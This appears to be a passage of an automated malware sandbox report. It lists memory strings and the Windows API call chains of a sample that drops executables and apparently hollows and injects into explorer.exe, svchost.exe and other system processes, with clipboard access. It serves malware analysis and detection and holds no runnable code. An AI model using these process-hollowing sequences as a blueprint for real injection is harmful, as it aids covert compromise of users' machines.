                    Source: explorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                    Source: explorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                    Source: explorer.exe, 00000005.00000000.1541930991.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2801180854.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2173753327.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/EM0
                    Source: explorer.exe, 00000005.00000002.2801032644.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1541930991.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com48
                    Source: 4F82.tmp.zx.exe, 0000000C.00000003.1720842767.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714525061.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724976158.00000121A74A8000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714317298.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1714102710.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1720842767.00000121A74AC000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1713929591.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1721815071.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724066272.00000121A74AC000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1713770843.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1722411328.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724066272.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000C.00000003.1724976158.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, _ctypes.pyd.12.dr, select.pyd.12.dr, _socket.pyd.12.dr, _hashlib.pyd.12.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: explorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
                    Source: explorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
                    Source: explorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
                    Source: explorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
                    Source: explorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
                    Source: explorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
                    Source: explorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
                    Source: explorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
                    Source: explorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
                    Source: explorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
                    Source: explorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
                    Source: explorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
                    Source: explorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
                    Source: explorer.exe, 00000005.00000000.1533270672.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2789164926.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2287065836.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0B7B50 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_0B0B7B50
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0B7B50 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_0B0B7B50
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DF07B50 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_0DF07B50
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFE7B50 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_0DFE7B50
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0B7960 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_0B0B7960
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeCode function: 0_2_00007FF7853124D8 GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,0_2_00007FF7853124D8
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0A1370 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free,5_2_0B0A1370
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CF438 RtlCaptureContext,NtQueryInformationProcess,5_2_0B0CF438
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CF438 RtlCaptureContext,NtQueryInformationProcess,5_2_0B0CF438
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DF1F438 RtlCaptureContext,NtQueryInformationProcess,5_2_0DF1F438
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DF1F438 RtlCaptureContext,NtQueryInformationProcess,5_2_0DF1F438
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DEF1370 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free,5_2_0DEF1370
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFFF438 RtlCaptureContext,NtQueryInformationProcess,5_2_0DFFF438
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFFF438 RtlCaptureContext,NtQueryInformationProcess,5_2_0DFFF438
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFFF438 RtlCaptureContext,NtQueryInformationProcess,5_2_0DFFF438
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFD1370 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free,5_2_0DFD1370
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeCode function: 7_2_00007FF6DAD724D8 GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,7_2_00007FF6DAD724D8
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeCode function: 0_2_00007FF7853134180_2_00007FF785313418
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeCode function: 0_2_00007FF7853124D80_2_00007FF7853124D8
                    Source: C:\Windows\System32\svchost.exeCode function: 2_2_00007FF67E6D34182_2_00007FF67E6D3418
                    Source: C:\Windows\System32\svchost.exeCode function: 2_2_00007FF67E6D24D82_2_00007FF67E6D24D8
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0A70705_2_0B0A7070
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0B50705_2_0B0B5070
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0A17F05_2_0B0A17F0
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0A7B7D5_2_0B0A7B7D
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0A7B875_2_0B0A7B87
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0A7B9B5_2_0B0A7B9B
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0A7B915_2_0B0A7B91
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0A7BAD5_2_0B0A7BAD
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0A7BA35_2_0B0A7BA3
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0C73B05_2_0B0C73B0
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0A7AF05_2_0B0A7AF0
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0C29645_2_0B0C2964
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0BD9645_2_0B0BD964
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0C79D45_2_0B0C79D4
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CA0285_2_0B0CA028
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0C00205_2_0B0C0020
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CDF025_2_0B0CDF02
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CB7A45_2_0B0CB7A4
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0C97D45_2_0B0C97D4
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CAD745_2_0B0CAD74
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0BFD885_2_0B0BFD88
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0C25B45_2_0B0C25B4
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CD45C5_2_0B0CD45C
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0B34C75_2_0B0B34C7
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DF125B45_2_0DF125B4
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DF0FD885_2_0DF0FD88
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DF1AD745_2_0DF1AD74
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DF034C75_2_0DF034C7
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DF1D45C5_2_0DF1D45C
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DEF17F05_2_0DEF17F0
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DF197D45_2_0DF197D4
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DF1B7A45_2_0DF1B7A4
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DF1DF025_2_0DF1DF02
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DF179D45_2_0DF179D4
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DF0D9645_2_0DF0D964
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DF129645_2_0DF12964
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DF050705_2_0DF05070
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DEF70705_2_0DEF7070
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DF100205_2_0DF10020
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DF1A0285_2_0DF1A028
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DF173B05_2_0DF173B0
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DEF7BAD5_2_0DEF7BAD
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DEF7BA35_2_0DEF7BA3
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DEF7B875_2_0DEF7B87
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DEF7B9B5_2_0DEF7B9B
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DEF7B915_2_0DEF7B91
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DEF7B7D5_2_0DEF7B7D
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DEF7AF05_2_0DEF7AF0
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFF25B45_2_0DFF25B4
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFEFD885_2_0DFEFD88
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFFAD745_2_0DFFAD74
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFE34C75_2_0DFE34C7
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFFD45C5_2_0DFFD45C
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFD17F05_2_0DFD17F0
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFF97D45_2_0DFF97D4
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFFB7A45_2_0DFFB7A4
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFFDF025_2_0DFFDF02
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFF79D45_2_0DFF79D4
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFED9645_2_0DFED964
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFF29645_2_0DFF2964
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFD70705_2_0DFD7070
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFE50705_2_0DFE5070
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFFA0285_2_0DFFA028
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFF00205_2_0DFF0020
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFF73B05_2_0DFF73B0
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFD7BAD5_2_0DFD7BAD
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFD7BA35_2_0DFD7BA3
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFD7B9B5_2_0DFD7B9B
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFD7B915_2_0DFD7B91
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFD7B875_2_0DFD7B87
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFD7B7D5_2_0DFD7B7D
                    Source: C:\Windows\explorer.exeCode function: 5_2_0DFD7AF05_2_0DFD7AF0
                    Source: C:\Windows\explorer.exeCode function: 5_2_00B6B0D95_2_00B6B0D9
                    Source: C:\Windows\explorer.exeCode function: 5_2_00B469A55_2_00B469A5
                    Source: C:\Windows\explorer.exeCode function: 5_2_00B411255_2_00B41125
                    Source: C:\Windows\explorer.exeCode function: 5_2_00B5F9555_2_00B5F955
                    Source: C:\Windows\explorer.exeCode function: 5_2_00B5D2995_2_00B5D299
                    Source: C:\Windows\explorer.exeCode function: 5_2_00B622995_2_00B62299
                    Source: C:\Windows\explorer.exeCode function: 5_2_00B474B85_2_00B474B8
                    Source: C:\Windows\explorer.exeCode function: 5_2_00B474AE5_2_00B474AE
                    Source: C:\Windows\explorer.exeCode function: 5_2_00B66CE55_2_00B66CE5
                    Source: C:\Windows\explorer.exeCode function: 5_2_00B474E05_2_00B474E0
                    Source: C:\Windows\explorer.exeCode function: 5_2_00B474D65_2_00B474D6
                    Source: C:\Windows\explorer.exeCode function: 5_2_00B474C25_2_00B474C2
                    Source: C:\Windows\explorer.exeCode function: 5_2_00B474CC5_2_00B474CC
                    Source: C:\Windows\explorer.exeCode function: 5_2_00B474255_2_00B47425
                    Source: C:\Windows\explorer.exeCode function: 5_2_00B52DFC5_2_00B52DFC
                    Source: C:\Windows\explorer.exeCode function: 5_2_00B5F6BD5_2_00B5F6BD
                    Source: C:\Windows\explorer.exeCode function: 5_2_00B6A6A95_2_00B6A6A9
                    Source: C:\Windows\explorer.exeCode function: 5_2_02BFD2995_2_02BFD299
                    Source: C:\Windows\explorer.exeCode function: 5_2_02C022995_2_02C02299
                    Source: C:\Windows\explorer.exeCode function: 5_2_02C0B0D95_2_02C0B0D9
                    Source: C:\Windows\explorer.exeCode function: 5_2_02BE69A55_2_02BE69A5
                    Source: C:\Windows\explorer.exeCode function: 5_2_02BE11255_2_02BE1125
                    Source: C:\Windows\explorer.exeCode function: 5_2_02BFF9555_2_02BFF955
                    Source: C:\Windows\explorer.exeCode function: 5_2_02BFF6BD5_2_02BFF6BD
                    Source: C:\Windows\explorer.exeCode function: 5_2_02C0A6A95_2_02C0A6A9
                    Source: C:\Windows\explorer.exeCode function: 5_2_02BE74B85_2_02BE74B8
                    Source: C:\Windows\explorer.exeCode function: 5_2_02BE74AE5_2_02BE74AE
                    Source: C:\Windows\explorer.exeCode function: 5_2_02C06CE55_2_02C06CE5
                    Source: C:\Windows\explorer.exeCode function: 5_2_02BE74E05_2_02BE74E0
                    Source: C:\Windows\explorer.exeCode function: 5_2_02BE74D65_2_02BE74D6
                    Source: C:\Windows\explorer.exeCode function: 5_2_02BE74CC5_2_02BE74CC
                    Source: C:\Windows\explorer.exeCode function: 5_2_02BE74C25_2_02BE74C2
                    Source: C:\Windows\explorer.exeCode function: 5_2_02BE74255_2_02BE7425
                    Source: C:\Windows\explorer.exeCode function: 5_2_02BF2DFC5_2_02BF2DFC
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B9B22995_2_0B9B2299
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B9AD2995_2_0B9AD299
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B9969A55_2_0B9969A5
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B9911255_2_0B991125
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B9AF9555_2_0B9AF955
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B9BB0D95_2_0B9BB0D9
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B9AF6BD5_2_0B9AF6BD
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B9BA6A95_2_0B9BA6A9
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B9A2DFC5_2_0B9A2DFC
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B9974B85_2_0B9974B8
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B9974AE5_2_0B9974AE
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B9974D65_2_0B9974D6
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B9974CC5_2_0B9974CC
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B9974C25_2_0B9974C2
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B9974E05_2_0B9974E0
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B9B6CE55_2_0B9B6CE5
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B9974255_2_0B997425
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeCode function: 6_2_013BDC746_2_013BDC74
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeCode function: 6_2_0538EE586_2_0538EE58
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeCode function: 6_2_053888506_2_05388850
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeCode function: 6_2_053800076_2_05380007
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeCode function: 6_2_053800406_2_05380040
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeCode function: 6_2_053888406_2_05388840
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeCode function: 6_2_07F409C86_2_07F409C8
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeCode function: 7_2_00007FF6DAD734187_2_00007FF6DAD73418
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeCode function: 7_2_00007FF6DAD724D87_2_00007FF6DAD724D8
                    Source: C:\Windows\System32\audiodg.exeCode function: 9_2_00007FF6EC8434189_2_00007FF6EC843418
                    Source: C:\Windows\System32\audiodg.exeCode function: 9_2_00007FF6EC8424D89_2_00007FF6EC8424D8
                    Source: C:\Windows\System32\msiexec.exeCode function: 10_2_00007FF7EE06341810_2_00007FF7EE063418
                    Source: C:\Windows\System32\msiexec.exeCode function: 10_2_00007FF7EE0624D810_2_00007FF7EE0624D8
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF729365C7412_2_00007FF729365C74
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF72935FBD812_2_00007FF72935FBD8
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF72934100012_2_00007FF729341000
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF729350A6012_2_00007FF729350A60
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF72935128012_2_00007FF729351280
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF729368A3812_2_00007FF729368A38
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF729357AAC12_2_00007FF729357AAC
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF72936518C12_2_00007FF72936518C
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF72935D20012_2_00007FF72935D200
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF7293591B012_2_00007FF7293591B0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF729350C6412_2_00007FF729350C64
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF72935148412_2_00007FF729351484
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF729352CC412_2_00007FF729352CC4
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF729360B8412_2_00007FF729360B84
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF729348B2012_2_00007FF729348B20
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF7293573F412_2_00007FF7293573F4
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF7293633BC12_2_00007FF7293633BC
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF729350E7012_2_00007FF729350E70
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF729364F1012_2_00007FF729364F10
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF72935CD6C12_2_00007FF72935CD6C
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF7293495FB12_2_00007FF7293495FB
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF72935107412_2_00007FF729351074
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF72935D88012_2_00007FF72935D880
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF72935504012_2_00007FF729355040
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF7293528C012_2_00007FF7293528C0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF729362F2012_2_00007FF729362F20
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF72936572812_2_00007FF729365728
